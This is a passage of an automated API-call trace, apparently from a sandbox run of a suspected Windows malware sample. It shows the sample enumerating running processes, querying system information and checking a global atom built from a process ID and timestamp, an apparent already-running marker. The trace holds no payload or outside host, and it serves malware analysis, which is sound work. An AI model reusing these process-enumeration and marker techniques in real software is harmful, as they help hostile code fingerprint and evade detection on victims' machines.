	[0133.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.160] CloseHandle (hObject=0x2dc) returned 1
	[0133.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.160] CloseHandle (hObject=0x2dc) returned 1
	[0133.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.161] CloseHandle (hObject=0x2dc) returned 1
	[0133.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.161] CloseHandle (hObject=0x2dc) returned 1
	[0133.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.161] CloseHandle (hObject=0x2dc) returned 1
	[0133.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.162] CloseHandle (hObject=0x2dc) returned 1
	[0133.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.162] CloseHandle (hObject=0x2dc) returned 1
	[0133.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.163] CloseHandle (hObject=0x2dc) returned 1
	[0133.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.163] CloseHandle (hObject=0x2dc) returned 1
	[0133.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.164] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.165] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.165] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.165] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.166] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.167] GetLastError () returned 0x5
	[0133.168] GetLastError () returned 0x5
	[0133.168] GetLastError () returned 0x5
	[0133.168] GetLastError () returned 0x5
	[0133.168] GetLastError () returned 0x5
	[0133.168] GetLastError () returned 0x5
	[0133.168] GetLastError () returned 0x5
	[0133.168] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.168] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.168] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.168] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.168] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.168] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.169] CloseHandle (hObject=0x2dc) returned 1
	[0133.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.169] CloseHandle (hObject=0x2dc) returned 1
	[0133.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.169] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.169] CloseHandle (hObject=0x2dc) returned 1
	[0133.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.170] CloseHandle (hObject=0x2dc) returned 1
	[0133.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.170] CloseHandle (hObject=0x2dc) returned 1
	[0133.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.171] CloseHandle (hObject=0x2dc) returned 1
	[0133.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16d28) returned 0xc0000004
	[0133.202] VirtualAlloc (lpAddress=0x0, dwSize=0x16e28, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0133.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16e28, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0133.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0133.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.209] CloseHandle (hObject=0x2dc) returned 1
	[0133.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.209] CloseHandle (hObject=0x2dc) returned 1
	[0133.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.210] CloseHandle (hObject=0x2dc) returned 1
	[0133.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.210] CloseHandle (hObject=0x2dc) returned 1
	[0133.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.211] CloseHandle (hObject=0x2dc) returned 1
	[0133.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.211] CloseHandle (hObject=0x2dc) returned 1
	[0133.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.212] CloseHandle (hObject=0x2dc) returned 1
	[0133.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.212] CloseHandle (hObject=0x2dc) returned 1
	[0133.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.213] CloseHandle (hObject=0x2dc) returned 1
	[0133.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.213] CloseHandle (hObject=0x2dc) returned 1
	[0133.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.214] CloseHandle (hObject=0x2dc) returned 1
	[0133.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.214] CloseHandle (hObject=0x2dc) returned 1
	[0133.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
